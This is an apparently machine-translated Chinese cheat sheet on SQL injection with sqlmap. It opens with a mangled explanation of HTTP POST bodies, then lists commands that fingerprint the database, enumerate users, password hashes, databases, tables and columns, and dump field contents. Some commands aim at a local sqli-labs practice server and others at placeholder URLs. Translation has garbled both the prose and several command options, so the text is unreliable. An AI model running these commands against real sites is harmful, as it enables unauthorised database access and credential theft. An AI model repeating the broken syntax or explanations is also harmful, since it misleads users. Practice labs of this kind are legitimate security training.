HTTP协议规定,开机自检提交的数据必须放在消息主体(实体-主体)中,但协议没有规定数据需要使用什么样的编码方式。 在ASCII码中传输HTTP协议,并在重传TCP/IP协议的基础上建立APP应用层规范。 HTTP请求分为三部分:状态行、请求标头和消息主体。 如下所示。
通常,服务端根据请求标头中的Content_Type字段,获取请求中的消息主体是如何编码的,并分析消息主体。
SQLmap常规操作GET格式python SQL map.py-u“http://URL地址/index.PHP? id=1” //注入判断-u:URL地址参数
python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-1/index.PHP? id=1”- -查看banner//数据库版本
python sqlmap.py-u“http://URL地址/index.PHP? id=1”- -当前用户//当前用户
python sqlmap.py-u“http://URL地址/index.PHP? id=1” --password //数据库用户密码咨询
python sqlmap.py-u“http://URL地址/index.PHP? id=1”- -查看DBS//所有数据库
python sqlmap.py-u“http://URL地址/index.PHP? id=1” --current-db //查看当前数据库
python sqlmap.py-u“http://URL地址/index.PHP? id=1” --tables //查看所有表格
python sqlmap.py-u“http://URL地址/index.PHP? 查看id=1” --tables -D A //库下的所有表
python sqlmap.py-u“http://URL地址/index.PHP? id=1” --columns -D A -T B //查询a库b表下的所有列
python sqlmap.py-u“http://URL地址/index.PHP? id=1” -C “E,F” -D A -T B //导出字段的内容
——POST格式3354 python sqlmap.py-u“http://URL/”--data“uname=123 passwd=123 submit”//指定页面的POST注入
Python sqlmap.py -r“绝对路径文件名”--level 3
python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-20/index.PHP”--cookie=“uname=admin”- -
Python sqlmap.py -r绝对路径文件名. txt注入-level2///检查文件中的cookie字段
python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-20/index.PHP”--cookie=“uname=admin”- -
python sqlmap.py-u“http://192.168.0.141/sqli-labs/less-1/index.PHP? id=1”- -查看主机名称//主机名